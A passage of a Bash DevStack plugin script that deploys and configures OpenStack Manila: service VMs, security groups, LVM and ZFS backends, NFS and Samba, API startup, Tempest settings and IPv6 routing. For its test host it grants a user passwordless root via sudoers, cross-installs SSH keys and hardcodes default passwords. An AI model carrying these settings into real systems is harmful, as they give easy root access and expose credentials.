--flavor $MANILA_SERVICE_VM_FLAVOR_NAME \
--image $MANILA_SERVICE_IMAGE_NAME \
--nic net-id=$private_net_id \
--security-group $MANILA_SERVICE_SECGROUP \
--key-name $MANILA_SERVICE_KEYPAIR_NAME \
| grep ' id ' | get_field 2)
else
vm_id=$(openstack server show $vm_name -f value -c id)
fi
floating_ip=$(openstack floating ip create $PUBLIC_NETWORK_NAME --subnet $PUBLIC_SUBNET_NAME | grep 'floating_ip_address' | get_field 2)
# TODO(rishabh-d-dave): For time being circumvent the bug -
# https://bugs.launchpad.net/python-openstackclient/+bug/1747721
# Once fixed, replace the following 3 lines by -
# openstack server add floating ip $vm_id $floating_ip
vm_port_id=$(openstack port list --server $vm_id -c ID -f \
value)
openstack floating ip set --port $vm_port_id $floating_ip
iniset $MANILA_CONF $BE service_instance_name_or_id $vm_id
iniset $MANILA_CONF $BE service_net_name_or_ip $floating_ip
iniset $MANILA_CONF $BE tenant_net_name_or_ip $PRIVATE_NETWORK_NAME
else
if is_service_enabled neutron; then
if ! [[ -z $MANILA_ADMIN_NET_RANGE ]]; then
if [ $created_admin_network == false ]; then
project_id=$(openstack project show $SERVICE_PROJECT_NAME -c id -f value)
local admin_net_id=$( openstack network show admin_net -f value -c id )
if [[ -z $admin_net_id ]]; then
openstack network create admin_net --project $project_id
admin_net_id=$(openstack network show admin_net -f value -c id)
fi
local admin_subnet_id=$( openstack subnet show admin_subnet -f value -c id )
if [[ -z $admin_subnet_id ]]; then
openstack subnet create admin_subnet --project $project_id --ip-version 4 --network $admin_net_id --gateway None --subnet-range $MANILA_ADMIN_NET_RANGE
admin_subnet_id=$(openstack subnet show admin_subnet -f value -c id)
fi
created_admin_network=true
fi
iniset $MANILA_CONF $BE admin_network_id $admin_net_id
iniset $MANILA_CONF $BE admin_subnet_id $admin_subnet_id
fi
fi
fi
fi
done
configure_data_service_generic_driver
}
function configure_data_service_generic_driver {
enabled_backends=(${MANILA_ENABLED_BACKENDS//,/ })
share_driver=$(iniget $MANILA_CONF ${enabled_backends[0]} share_driver)
generic_driver='manila.share.drivers.generic.GenericShareDriver'
if [[ $share_driver == $generic_driver ]]; then
driver_handles_share_servers=$(iniget $MANILA_CONF ${enabled_backends[0]} driver_handles_share_servers)
if [[ $(trueorfalse False driver_handles_share_servers) == False ]]; then
iniset $MANILA_CONF DEFAULT data_node_access_ips $PUBLIC_NETWORK_GATEWAY
else
if ! [[ -z $MANILA_DATA_NODE_IP ]]; then
iniset $MANILA_CONF DEFAULT data_node_access_ips $MANILA_DATA_NODE_IP
fi
fi
fi
}
# create_manila_service_flavor - creates flavor, that will be used by backends
# with configured generic driver to boot Nova VMs with.
function create_manila_service_flavor {
if is_service_enabled nova; then
local flavor_exists=$( openstack flavor list | grep " $MANILA_SERVICE_VM_FLAVOR_NAME " )
if [[ -z $flavor_exists ]]; then
# Create flavor for Manila's service VM
openstack flavor create \
$MANILA_SERVICE_VM_FLAVOR_NAME \
--id $MANILA_SERVICE_VM_FLAVOR_REF \
--ram $MANILA_SERVICE_VM_FLAVOR_RAM \
--disk $MANILA_SERVICE_VM_FLAVOR_DISK \
--vcpus $MANILA_SERVICE_VM_FLAVOR_VCPUS
fi
fi
}
# create_manila_service_image - creates image, that will be used by backends
# with configured generic driver to boot Nova VMs from.
function create_manila_service_image {
if is_service_enabled nova; then
TOKEN=$(openstack token issue -c id -f value)
local image_exists=$( openstack image list | grep " $MANILA_SERVICE_IMAGE_NAME " )
if [[ -z $image_exists ]]; then
# Download Manila's image
if is_service_enabled g-reg; then
upload_image $MANILA_SERVICE_IMAGE_URL $TOKEN
fi
fi
fi
}
# create_manila_service_secgroup - creates security group that is used by
# Nova VMs when generic driver is configured.
function create_manila_service_secgroup {
# Create a secgroup
if ! openstack security group list | grep -q $MANILA_SERVICE_SECGROUP; then
openstack security group create $MANILA_SERVICE_SECGROUP --description "$MANILA_SERVICE_SECGROUP description"
if ! timeout 30 sh -c "while ! openstack security group list | grep -q $MANILA_SERVICE_SECGROUP; do sleep 1; done"; then
echo "Security group not created"
exit 1
fi
fi
# Configure Security Group Rules
if ! openstack security group rule list $MANILA_SERVICE_SECGROUP | grep -q icmp; then
openstack security group rule create $MANILA_SERVICE_SECGROUP --protocol icmp
fi
if ! openstack security group rule list $MANILA_SERVICE_SECGROUP | grep -q " tcp .* 22 "; then
openstack security group rule create $MANILA_SERVICE_SECGROUP --protocol tcp --dst-port 22
fi
if ! openstack security group rule list $MANILA_SERVICE_SECGROUP | grep -q " tcp .* 2049 "; then
openstack security group rule create $MANILA_SERVICE_SECGROUP --protocol tcp --dst-port 2049
fi
if ! openstack security group rule list $MANILA_SERVICE_SECGROUP | grep -q " udp .* 2049 "; then
openstack security group rule create $MANILA_SERVICE_SECGROUP --protocol udp --dst-port 2049
fi
if ! openstack security group rule list $MANILA_SERVICE_SECGROUP | grep -q " udp .* 445 "; then
openstack security group rule create $MANILA_SERVICE_SECGROUP --protocol udp --dst-port 445
fi
if ! openstack security group rule list $MANILA_SERVICE_SECGROUP | grep -q " tcp .* 445 "; then
openstack security group rule create $MANILA_SERVICE_SECGROUP --protocol tcp --dst-port 445
fi
if ! openstack security group rule list $MANILA_SERVICE_SECGROUP | grep -q " tcp .* 139 "; then
openstack security group rule create $MANILA_SERVICE_SECGROUP --protocol tcp --dst-port 137:139
fi
if ! openstack security group rule list $MANILA_SERVICE_SECGROUP | grep -q " udp .* 139 "; then
openstack security group rule create $MANILA_SERVICE_SECGROUP --protocol udp --dst-port 137:139
fi
# List secgroup rules
openstack security group rule list $MANILA_SERVICE_SECGROUP
}
# create_manila_accounts - Set up common required manila accounts
function create_manila_accounts {
create_service_user "manila"
get_or_create_service "manila" "share" "Manila Shared Filesystem Service"
get_or_create_endpoint "share" "$REGION_NAME" \
"$MANILA_ENDPOINT_BASE/v1/\$(project_id)s"
# Set up Manila v2 service and endpoint
get_or_create_service "manilav2" "sharev2" "Manila Shared Filesystem Service V2"
get_or_create_endpoint "sharev2" "$REGION_NAME" \
"$MANILA_ENDPOINT_BASE/v2/\$(project_id)s"
}
# create_default_share_group_type - create share group type that will be set as default.
function create_default_share_group_type {
local type_exists=$( manila share-group-type-list | grep " $MANILA_DEFAULT_SHARE_GROUP_TYPE " )
if [[ -z $type_exists ]]; then
manila share-group-type-create $MANILA_DEFAULT_SHARE_GROUP_TYPE $MANILA_DEFAULT_SHARE_TYPE
fi
if [[ $MANILA_DEFAULT_SHARE_GROUP_TYPE_SPECS ]]; then
manila share-group-type-key $MANILA_DEFAULT_SHARE_GROUP_TYPE set $MANILA_DEFAULT_SHARE_GROUP_TYPE_SPECS
fi
}
# create_default_share_type - create share type that will be set as default
# if $MANILA_CONFIGURE_DEFAULT_TYPES is set to True, if set to False, the share
# type identified by $MANILA_DEFAULT_SHARE_TYPE is still created, but not
# configured as default.
function create_default_share_type {
enabled_backends=(${MANILA_ENABLED_BACKENDS//,/ })
driver_handles_share_servers=$(iniget $MANILA_CONF ${enabled_backends[0]} driver_handles_share_servers)
local type_exists=$( manila type-list | grep " $MANILA_DEFAULT_SHARE_TYPE " )
if [[ -z $type_exists ]]; then
local command_args="$MANILA_DEFAULT_SHARE_TYPE $driver_handles_share_servers"
#if is_driver_enabled $MANILA_CONTAINER_DRIVER; then
# # TODO(aovchinnikov): Remove this condition when Container driver supports
# # snapshots
# command_args="$command_args --snapshot_support false"
#fi
manila type-create $command_args
fi
if [[ $MANILA_DEFAULT_SHARE_TYPE_EXTRA_SPECS ]]; then
manila type-key $MANILA_DEFAULT_SHARE_TYPE set $MANILA_DEFAULT_SHARE_TYPE_EXTRA_SPECS
fi
}
# create_custom_share_types - create share types suitable for both possible
# driver modes with names "dhss_true" and "dhss_false".
function create_custom_share_types {
manila type-create dhss_true True
if [[ $MANILA_DHSS_TRUE_SHARE_TYPE_EXTRA_SPECS ]]; then
manila type-key dhss_true set $MANILA_DHSS_TRUE_SHARE_TYPE_EXTRA_SPECS
fi
manila type-create dhss_false False
if [[ $MANILA_DHSS_FALSE_SHARE_TYPE_EXTRA_SPECS ]]; then
manila type-key dhss_false set $MANILA_DHSS_FALSE_SHARE_TYPE_EXTRA_SPECS
fi
}
# configure_backing_file - Set up backing file for LVM
function configure_backing_file {
sudo vgscan
if ! sudo vgs $SHARE_GROUP; then
if [ "$CONFIGURE_BACKING_FILE" = "True" ]; then
SHARE_BACKING_FILE=${SHARE_BACKING_FILE:-$DATA_DIR/${SHARE_GROUP}-backing-file}
# Only create if the file doesn't already exists
[[ -f $SHARE_BACKING_FILE ]] || truncate -s $SHARE_BACKING_FILE_SIZE $SHARE_BACKING_FILE
DEV=`sudo losetup -f --show $SHARE_BACKING_FILE`
else
DEV=$SHARE_BACKING_FILE
fi
# Only create if the loopback device doesn't contain $SHARE_GROUP
if ! sudo vgs $SHARE_GROUP; then sudo vgcreate $SHARE_GROUP $DEV; fi
fi
mkdir -p $MANILA_STATE_PATH/shares
mkdir -p /tmp/shares
}
# init_manila - Initializes database and creates manila dir if absent
function init_manila {
if is_service_enabled $DATABASE_BACKENDS; then
# (re)create manila database
recreate_database manila
$MANILA_BIN_DIR/manila-manage db sync
if [[ $(trueorfalse False MANILA_USE_DOWNGRADE_MIGRATIONS) == True ]]; then
# Use both - upgrade and downgrade migrations to verify that
# downgrade migrations do not break structure of Manila database.
$MANILA_BIN_DIR/manila-manage db downgrade
$MANILA_BIN_DIR/manila-manage db sync
fi
# Display version as debug-action (see bug/1473400)
$MANILA_BIN_DIR/manila-manage db version
fi
if [ "$SHARE_DRIVER" == "manila.share.drivers.lvm.LVMShareDriver" ]; then
if is_service_enabled m-shr; then
# Configure a default volume group called '`lvm-shares`' for the share
# service if it does not yet exist. If you don't wish to use a file backed
# volume group, create your own volume group called ``stack-volumes`` before
# invoking ``stack.sh``.
#
# By default, the backing file is 8G in size, and is stored in ``/opt/stack/data``.
configure_backing_file
fi
elif [ "$SHARE_DRIVER" == $MANILA_CONTAINER_DRIVER ]; then
if is_service_enabled m-shr; then
SHARE_GROUP=$MANILA_CONTAINER_VOLUME_GROUP_NAME
configure_backing_file
fi
elif [ "$SHARE_DRIVER" == "manila.share.drivers.zfsonlinux.driver.ZFSonLinuxShareDriver" ]; then
if is_service_enabled m-shr; then
mkdir -p $MANILA_ZFSONLINUX_BACKEND_FILES_CONTAINER_DIR
file_counter=0
MANILA_ZFSONLINUX_SERVICE_IP=${MANILA_ZFSONLINUX_SERVICE_IP:-"127.0.0.1"}
for BE in ${MANILA_ENABLED_BACKENDS//,/ }; do
if [[ $file_counter == 0 ]]; then
# NOTE(vponomaryov): create two pools for first ZFS backend
# to cover different use cases that are supported by driver:
# - Support of more than one zpool for share backend.
# - Support of nested datasets.
local first_file="$MANILA_ZFSONLINUX_BACKEND_FILES_CONTAINER_DIR"/alpha
local second_file="$MANILA_ZFSONLINUX_BACKEND_FILES_CONTAINER_DIR"/betta
truncate -s $MANILA_ZFSONLINUX_ZPOOL_SIZE $first_file
truncate -s $MANILA_ZFSONLINUX_ZPOOL_SIZE $second_file
sudo zpool create alpha $first_file
sudo zpool create betta $second_file
# Create subdir (nested dataset) for second pool
sudo zfs create betta/subdir
iniset $MANILA_CONF $BE zfs_zpool_list alpha,betta/subdir
elif [[ $file_counter == 1 ]]; then
local file="$MANILA_ZFSONLINUX_BACKEND_FILES_CONTAINER_DIR"/gamma
truncate -s $MANILA_ZFSONLINUX_ZPOOL_SIZE $file
sudo zpool create gamma $file
iniset $MANILA_CONF $BE zfs_zpool_list gamma
else
local filename=file"$file_counter"
local file="$MANILA_ZFSONLINUX_BACKEND_FILES_CONTAINER_DIR"/"$filename"
truncate -s $MANILA_ZFSONLINUX_ZPOOL_SIZE $file
sudo zpool create $filename $file
iniset $MANILA_CONF $BE zfs_zpool_list $filename
fi
iniset $MANILA_CONF $BE zfs_share_export_ip $MANILA_ZFSONLINUX_SHARE_EXPORT_IP
iniset $MANILA_CONF $BE zfs_service_ip $MANILA_ZFSONLINUX_SERVICE_IP
iniset $MANILA_CONF $BE zfs_dataset_creation_options $MANILA_ZFSONLINUX_DATASET_CREATION_OPTIONS
iniset $MANILA_CONF $BE zfs_use_ssh $MANILA_ZFSONLINUX_USE_SSH
iniset $MANILA_CONF $BE zfs_ssh_username $MANILA_ZFSONLINUX_SSH_USERNAME
iniset $MANILA_CONF $BE replication_domain $MANILA_ZFSONLINUX_REPLICATION_DOMAIN
iniset $MANILA_CONF $BE driver_handles_share_servers False
let "file_counter=file_counter+1"
done
# Install the server's SSH key in our known_hosts file
eval STACK_HOME=~$STACK_USER
ssh-keyscan ${MANILA_ZFSONLINUX_SERVICE_IP} >> $STACK_HOME/.ssh/known_hosts
# If the server is this machine, setup trust for ourselves (otherwise you're on your own)
if [ "$MANILA_ZFSONLINUX_SERVICE_IP" = "127.0.0.1" ] || [ "$MANILA_ZFSONLINUX_SERVICE_IP" = "localhost" ] ; then
# Trust our own SSH keys
eval SSH_USER_HOME=~$MANILA_ZFSONLINUX_SSH_USERNAME
cat $STACK_HOME/.ssh/*.pub >> $SSH_USER_HOME/.ssh/authorized_keys
# Give ssh user sudo access
echo "$MANILA_ZFSONLINUX_SSH_USERNAME ALL=(ALL) NOPASSWD: ALL" | sudo tee -a /etc/sudoers > /dev/null
iniset $MANILA_CONF DEFAULT data_node_access_ips $MANILA_ZFSONLINUX_SERVICE_IP
fi
fi
fi
}
# check_nfs_kernel_service_state_ubuntu- Make sure nfsd is running
function check_nfs_kernel_service_state_ubuntu {
# (aovchinnikov): Workaround for nfs-utils bug 1052264
if [[ $(sudo service nfs-kernel-server status &> /dev/null || echo 'fail') == 'fail' ]]; then
echo "Apparently nfsd is not running. Trying to fix that."
sudo mkdir -p "/media/nfsdonubuntuhelper"
# (aovchinnikov): shell wrapping is needed for cases when a file to be written
# is owned by root.
sudo sh -c "echo '/media/nfsdonubuntuhelper 127.0.0.1(ro)' >> /etc/exports"
sudo service nfs-kernel-server start
fi
if [[ $(sudo service nfs-kernel-server status &> /dev/null || echo 'fail') == 'fail' ]]; then
echo "Failed to start nfsd. Exiting."
exit 1
fi
}
function _install_nfs_and_samba {
if is_ubuntu; then
install_package nfs-kernel-server nfs-common samba
check_nfs_kernel_service_state_ubuntu
elif is_fedora; then
install_package nfs-utils samba
sudo systemctl enable smb.service
sudo systemctl start smb.service
sudo systemctl enable nfs-server.service
sudo systemctl start nfs-server.service
elif is_suse; then
install_package nfs-kernel-server nfs-utils samba
else
echo "This distro is not supported. Skipping step of NFS and Samba installation."
fi
}
# install_manilaclient - Collect source and prepare
# In order to install from git, add LIBS_FROM_GIT="python-manilaclient"
# to local.conf
function install_manilaclient {
if use_library_from_git "python-manilaclient"; then
git_clone $MANILACLIENT_REPO $MANILACLIENT_DIR $MANILACLIENT_BRANCH
setup_develop $MANILACLIENT_DIR
else
pip_install python-manilaclient
fi
}
# install_manila - Collect source and prepare
function install_manila {
setup_develop $MANILA_DIR
if is_service_enabled m-shr; then
if [[ ! $(systemctl is-active nfs-ganesha.service) == 'active' ]] ; then
if [ "$SHARE_DRIVER" != "manila.share.drivers.cephfs.driver.CephFSDriver" ] ; then
_install_nfs_and_samba
fi
fi
if [ "$SHARE_DRIVER" == "manila.share.drivers.zfsonlinux.driver.ZFSonLinuxShareDriver" ]; then
if [[ $(sudo zfs list &> /dev/null && sudo zpool list &> /dev/null || echo 'absent') == 'absent' ]]; then
# ZFS not found, try to install it
if is_ubuntu; then
if [[ $(lsb_release -s -d) == *"14.04"* ]]; then
# Trusty
sudo apt-get install -y software-properties-common
sudo apt-add-repository --yes ppa:zfs-native/stable
# Workaround for bug #1609696
sudo apt-mark hold grub*
sudo apt-get -y -q update && sudo apt-get -y -q upgrade
# Workaround for bug #1609696
sudo apt-mark unhold grub*
sudo apt-get install -y linux-headers-generic
sudo apt-get install -y build-essential
sudo apt-get install -y ubuntu-zfs
elif [[ $(echo $(lsb_release -rs) '>=' 16.04 | bc -l) == 1 ]]; then
# Xenial and beyond
sudo apt-get install -y zfsutils-linux
else
echo "Only 'Trusty', 'Xenial' and newer releases of Ubuntu are supported."
exit 1
fi
else
echo "Manila Devstack plugin supports installation "\
"of ZFS packages only for 'Ubuntu' distros. "\
"Please, install it first by other means or add its support "\
"for your distro."
exit 1
fi
sudo modprobe zfs
sudo modprobe zpool
fi
check_nfs_kernel_service_state_ubuntu
elif [ "$SHARE_DRIVER" == $MANILA_CONTAINER_DRIVER ]; then
if is_ubuntu; then
echo "Installing docker...."
install_docker_ubuntu
echo "Importing docker image"
import_docker_service_image_ubuntu
elif is_fedora; then
echo "Installing docker...."
install_docker_fedora
echo "Importing docker image"
# TODO(tbarron): See if using a fedora container image
# is faster/smaller because of fewer extra dependencies.
import_docker_service_image_ubuntu
else
echo "Manila Devstack plugin does not support Container Driver on"\
" distros other than Ubuntu or Fedora."
exit 1
fi
fi
fi
}
#configure_samba - Configure node as Samba server
function configure_samba {
if [ "$SHARE_DRIVER" == "manila.share.drivers.lvm.LVMShareDriver" ]; then
# TODO(vponomaryov): add here condition for ZFSonLinux driver too
# when it starts to support SAMBA
samba_daemon_name=smbd
if is_service_enabled m-shr; then
if is_fedora; then
samba_daemon_name=smb
fi
sudo service $samba_daemon_name restart || echo "Couldn't restart '$samba_daemon_name' service"
fi
if [[ -e /usr/share/samba/smb.conf ]]; then
sudo cp /usr/share/samba/smb.conf $SMB_CONF
fi
sudo chown $STACK_USER -R /etc/samba
iniset $SMB_CONF global include registry
iniset $SMB_CONF global security user
if [ ! -d "$SMB_PRIVATE_DIR" ]; then
sudo mkdir $SMB_PRIVATE_DIR
sudo touch $SMB_PRIVATE_DIR/secrets.tdb
fi
for backend_name in ${MANILA_ENABLED_BACKENDS//,/ }; do
iniset $MANILA_CONF $backend_name driver_handles_share_servers False
iniset $MANILA_CONF $backend_name lvm_share_export_ips $MANILA_LVM_SHARE_EXPORT_IPS
done
iniset $MANILA_CONF DEFAULT data_node_access_ips $HOST_IP
fi
}
# start_manila_api - starts manila API services and checks its availability
function start_manila_api {
# NOTE(vkmc) If both options are set to true we are using uwsgi
# as the preferred way to deploy manila. See
# https://governance.openstack.org/tc/goals/pike/deploy-api-in-wsgi.html#uwsgi-vs-mod-wsgi
# for more details
if [ $(trueorfalse False MANILA_USE_UWSGI) == True ] && [ $(trueorfalse False MANILA_USE_MOD_WSGI) == True ]; then
MSG="Both MANILA_USE_UWSGI and MANILA_USE_MOD_WSGI are set to True.
Using UWSGI as the preferred option
Set MANILA_USE_UWSGI to False to deploy manila api with MOD_WSGI"
warn $LINENO $MSG
fi
if [ $(trueorfalse False MANILA_USE_UWSGI) == True ]; then
echo "Deploying with UWSGI"
run_process m-api "$MANILA_BIN_DIR/uwsgi --ini $MANILA_UWSGI_CONF --procname-prefix manila-api"
elif [ $(trueorfalse False MANILA_USE_MOD_WSGI) == True ]; then
echo "Deploying with MOD_WSGI"
install_apache_wsgi
enable_apache_site manila-api
restart_apache_server
tail_log m-api /var/log/$APACHE_NAME/manila_api.log
else
echo "Deploying with built-in server"
run_process m-api "$MANILA_BIN_DIR/manila-api --config-file $MANILA_CONF"
fi
echo "Waiting for Manila API to start..."
# This is a health check against the manila-api service we just started.
# We use the port ($REAL_MANILA_SERVICE_PORT) here because we want to hit
# the bare service endpoint, even if the tls tunnel should be enabled.
# We're making sure that the internal port is checked using unencryted
# traffic at this point.
local MANILA_HEALTH_CHECK_URL=$MANILA_SERVICE_PROTOCOL://$MANILA_SERVICE_HOST:$REAL_MANILA_SERVICE_PORT
if [ $(trueorfalse False MANILA_USE_UWSGI) == True ]; then
MANILA_HEALTH_CHECK_URL=$MANILA_ENDPOINT_BASE
fi
if ! wait_for_service $SERVICE_TIMEOUT $MANILA_HEALTH_CHECK_URL; then
die $LINENO "Manila API did not start"
fi
# Start proxies if enabled
#
# If tls-proxy is enabled and MANILA_USE_UWSGI is set to True, a generic
# http-services-tls-proxy will be set up to handle tls-termination to
# manila as well as all the other https services, we don't need to
# create our own.
if [ $(trueorfalse False MANILA_USE_UWSGI) == False ] && is_service_enabled tls-proxy; then
start_tls_proxy manila '*' $MANILA_SERVICE_PORT $MANILA_SERVICE_HOST $MANILA_SERVICE_PORT_INT
fi
}
# start_rest_of_manila - starts non-api manila services
function start_rest_of_manila {
run_process m-shr "$MANILA_BIN_DIR/manila-share --config-file $MANILA_CONF"
run_process m-sch "$MANILA_BIN_DIR/manila-scheduler --config-file $MANILA_CONF"
run_process m-dat "$MANILA_BIN_DIR/manila-data --config-file $MANILA_CONF"
}
# start_manila - start all manila services. This function is kept for compatibility
# reasons with old approach.
function start_manila {
start_manila_api
start_rest_of_manila
}
# stop_manila - Stop running processes
function stop_manila {
# Disable manila api service
if [ $(trueorfalse False MANILA_USE_MOD_WSGI) == True ]; then
disable_apache_site manila-api
restart_apache_server
else
stop_process m-api
fi
# Kill all other manila processes
for serv in m-sch m-shr m-dat; do
stop_process $serv
done
}
function install_manila_tempest_plugin {
MANILA_TEMPEST_PLUGIN_REPO=${MANILA_TEMPEST_PLUGIN_REPO:-${GIT_BASE}/openstack/manila-tempest-plugin}
MANILA_TEMPEST_PLUGIN_BRANCH=${MANILA_TEMPEST_PLUGIN_BRANCH:-master}
MANILA_TEMPEST_PLUGIN_DIR=$DEST/manila-tempest-plugin
git_clone $MANILA_TEMPEST_PLUGIN_REPO $MANILA_TEMPEST_PLUGIN_DIR $MANILA_TEMPEST_PLUGIN_BRANCH
setup_develop $MANILA_TEMPEST_PLUGIN_DIR
}
# update_tempest - Function used for updating Tempest config if Tempest service enabled
function update_tempest {
if is_service_enabled tempest; then
TEMPEST_CONFIG=${TEMPEST_CONFIG:-$TEMPEST_DIR/etc/tempest.conf}
ADMIN_TENANT_NAME=${ADMIN_TENANT_NAME:-"admin"}
ADMIN_DOMAIN_NAME=${ADMIN_DOMAIN_NAME:-"Default"}
ADMIN_PASSWORD=${ADMIN_PASSWORD:-"secretadmin"}
if [ $(trueorfalse False MANILA_USE_SERVICE_INSTANCE_PASSWORD) == True ]; then
iniset $TEMPEST_CONFIG share image_password $MANILA_SERVICE_INSTANCE_PASSWORD
fi
iniset $TEMPEST_CONFIG share image_with_share_tools $MANILA_SERVICE_IMAGE_NAME
iniset $TEMPEST_CONFIG auth admin_username ${ADMIN_USERNAME:-"admin"}
iniset $TEMPEST_CONFIG auth admin_password ${ADMIN_PASSWORD:-"secretadmin"}
iniset $TEMPEST_CONFIG auth admin_tenant_name $ADMIN_TENANT_NAME
iniset $TEMPEST_CONFIG auth admin_domain_name $ADMIN_DOMAIN_NAME
iniset $TEMPEST_CONFIG identity username ${TEMPEST_USERNAME:-"demo"}
iniset $TEMPEST_CONFIG identity password $ADMIN_PASSWORD
iniset $TEMPEST_CONFIG identity tenant_name ${TEMPEST_TENANT_NAME:-"demo"}
iniset $TEMPEST_CONFIG identity domain_name $ADMIN_DOMAIN_NAME
iniset $TEMPEST_CONFIG identity alt_username ${ALT_USERNAME:-"alt_demo"}
iniset $TEMPEST_CONFIG identity alt_password $ADMIN_PASSWORD
iniset $TEMPEST_CONFIG identity alt_tenant_name ${ALT_TENANT_NAME:-"alt_demo"}
iniset $TEMPEST_CONFIG identity alt_domain_name $ADMIN_DOMAIN_NAME
fi
}
function install_docker_ubuntu {
sudo apt-get update
install_package apparmor
install_package docker.io
}
function install_docker_fedora {
sudo yum install -y docker
sudo systemctl enable docker
sudo systemctl start docker
}
function download_image {
local image_url=$1
local image image_fname
image_fname=`basename "$image_url"`
if [[ $image_url != file* ]]; then
# Downloads the image (uec ami+akistyle), then extracts it.
if [[ ! -f $FILES/$image_fname || "$(stat -c "%s" $FILES/$image_fname)" = "0" ]]; then
wget --progress=dot:giga -c $image_url -O $FILES/$image_fname
if [[ $? -ne 0 ]]; then
echo "Not found: $image_url"
return
fi
fi
image="$FILES/${image_fname}"
else
# File based URL (RFC 1738): ``file://host/path``
# Remote files are not considered here.
# unix: ``file:///home/user/path/file``
# windows: ``file:///C:/Documents%20and%20Settings/user/path/file``
image=$(echo $image_url | sed "s/^file:\/\///g")
if [[ ! -f $image || "$(stat -c "%s" $image)" == "0" ]]; then
echo "Not found: $image_url"
return
fi
fi
}
function import_docker_service_image_ubuntu {
GZIPPED_IMG_NAME=`basename "$MANILA_DOCKER_IMAGE_URL"`
IMG_NAME_LOAD=${GZIPPED_IMG_NAME%.*}
LOCAL_IMG_NAME=${IMG_NAME_LOAD%.*}
if [[ "$(sudo docker images -q $LOCAL_IMG_NAME)" == "" ]]; then
download_image $MANILA_DOCKER_IMAGE_URL
# Import image in Docker
gzip -d $FILES/$GZIPPED_IMG_NAME
sudo docker load --input $FILES/$IMG_NAME_LOAD
fi
}
function remove_docker_service_image {
sudo docker rmi $MANILA_DOCKER_IMAGE_ALIAS
}
function install_libraries {
if [ $(trueorfalse False MANILA_MULTI_BACKEND) == True ]; then
if [ $(trueorfalse True RUN_MANILA_HOST_ASSISTED_MIGRATION_TESTS) == True ]; then
if is_ubuntu; then
install_package nfs-common
else
install_package nfs-utils
fi
fi
fi
}
function setup_ipv6 {
# This will fail with multiple default routes and is not needed in CI
# but may be useful when developing with devstack locally
if [ $(trueorfalse False MANILA_RESTORE_IPV6_DEFAULT_ROUTE) == True ]; then
# save IPv6 default route to add back later after enabling forwarding
local default_route=$(ip -6 route | grep default | cut -d ' ' -f1,2,3,4,5)
fi
# make sure those system values are set
sudo sysctl -w net.ipv6.conf.lo.disable_ipv6=0
sudo sysctl -w net.ipv6.conf.all.accept_ra=2
sudo sysctl -w net.ipv6.conf.all.forwarding=1
# Disable in-band as our communication is only internal
sudo ovs-vsctl set Bridge $PUBLIC_BRIDGE other_config:disable-in-band=true
# Create address scopes and subnet pools
openstack address scope create --share --ip-version 4 scope-v4
openstack address scope create --share --ip-version 6 scope-v6
openstack subnet pool create $SUBNETPOOL_NAME_V4 --default-prefix-length $SUBNETPOOL_SIZE_V4 --pool-prefix $SUBNETPOOL_PREFIX_V4 --address-scope scope-v4 --default --share
openstack subnet pool create $SUBNETPOOL_NAME_V6 --default-prefix-length $SUBNETPOOL_SIZE_V6 --pool-prefix $SUBNETPOOL_PREFIX_V6 --address-scope scope-v6 --default --share
# Create example private network and router
openstack router create $Q_ROUTER_NAME
openstack network create $PRIVATE_NETWORK_NAME
openstack subnet create --ip-version 6 --use-default-subnet-pool --ipv6-address-mode $IPV6_ADDRESS_MODE --ipv6-ra-mode $IPV6_RA_MODE --network $PRIVATE_NETWORK_NAME $IPV6_PRIVATE_SUBNET_NAME
openstack subnet create --ip-version 4 --use-default-subnet-pool --network $PRIVATE_NETWORK_NAME $PRIVATE_SUBNET_NAME
openstack router add subnet $Q_ROUTER_NAME $IPV6_PRIVATE_SUBNET_NAME
openstack router add subnet $Q_ROUTER_NAME $PRIVATE_SUBNET_NAME
# Create public network
openstack network create $PUBLIC_NETWORK_NAME --external --default --provider-network-type flat --provider-physical-network $PUBLIC_PHYSICAL_NETWORK
local public_gateway_ipv6=$(openstack subnet create $IPV6_PUBLIC_SUBNET_NAME --ip-version 6 --network $PUBLIC_NETWORK_NAME --subnet-pool $SUBNETPOOL_NAME_V6 --no-dhcp -c gateway_ip -f value)
local public_gateway_ipv4=$(openstack subnet create $PUBLIC_SUBNET_NAME --ip-version 4 --network $PUBLIC_NETWORK_NAME --subnet-range $FLOATING_RANGE --no-dhcp -c gateway_ip -f value)
# Set router to use public network
openstack router set --external-gateway $PUBLIC_NETWORK_NAME $Q_ROUTER_NAME
# Configure interfaces due to NEUTRON_CREATE_INITIAL_NETWORKS=False
local ipv4_cidr_len=${FLOATING_RANGE#*/}
sudo ip -6 addr add "$public_gateway_ipv6"/$SUBNETPOOL_SIZE_V6 dev $PUBLIC_BRIDGE
sudo ip addr add $PUBLIC_NETWORK_GATEWAY/"$ipv4_cidr_len" dev $PUBLIC_BRIDGE
# Enabling interface is needed due to NEUTRON_CREATE_INITIAL_NETWORKS=False
sudo ip link set $PUBLIC_BRIDGE up
if [ "$SHARE_DRIVER" == "manila.share.drivers.lvm.LVMShareDriver" ]; then
for backend_name in ${MANILA_ENABLED_BACKENDS//,/ }; do
iniset $MANILA_CONF $backend_name lvm_share_export_ips $public_gateway_ipv4,$public_gateway_ipv6
done
iniset $MANILA_CONF DEFAULT data_node_access_ips $public_gateway_ipv4
fi
if [ "$SHARE_DRIVER" == "manila.share.drivers.cephfs.driver.CephFSDriver" ]; then
for backend_name in ${MANILA_ENABLED_BACKENDS//,/ }; do
iniset $MANILA_CONF $backend_name cephfs_ganesha_export_ips $public_gateway_ipv4,$public_gateway_ipv6
done
iniset $MANILA_CONF DEFAULT data_node_access_ips $public_gateway_ipv4
fi
# install Quagga for setting up the host routes dynamically
install_package quagga
# set Quagga daemons
(
echo "zebra=yes"
echo "bgpd=yes"
echo "ospfd=no"
echo "ospf6d=no"
echo "ripd=no"
echo "ripngd=no"
echo "isisd=no"
echo "babeld=no"
) | sudo tee /etc/quagga/daemons > /dev/null
# set Quagga zebra.conf
(
echo "hostname dsvm"
echo "password openstack"
echo "log file /var/log/quagga/zebra.log"
) | sudo tee /etc/quagga/zebra.conf > /dev/null
# set Quagga vtysh.conf
(
echo "service integrated-vtysh-config"
echo "username quagga nopassword"
) | sudo tee /etc/quagga/vtysh.conf > /dev/null
# set Quagga bgpd.conf
(
echo "log file /var/log/quagga/bgpd.log"
echo "bgp multiple-instance"
echo "router bgp 200"
echo " bgp router-id 1.2.3.4"
echo " neighbor $public_gateway_ipv6 remote-as 100"
echo " neighbor $public_gateway_ipv6 passive"
echo " address-family ipv6"
echo " neighbor $public_gateway_ipv6 activate"
echo "line vty"
echo "debug bgp events"
echo "debug bgp filters"
echo "debug bgp fsm"
echo "debug bgp keepalives"
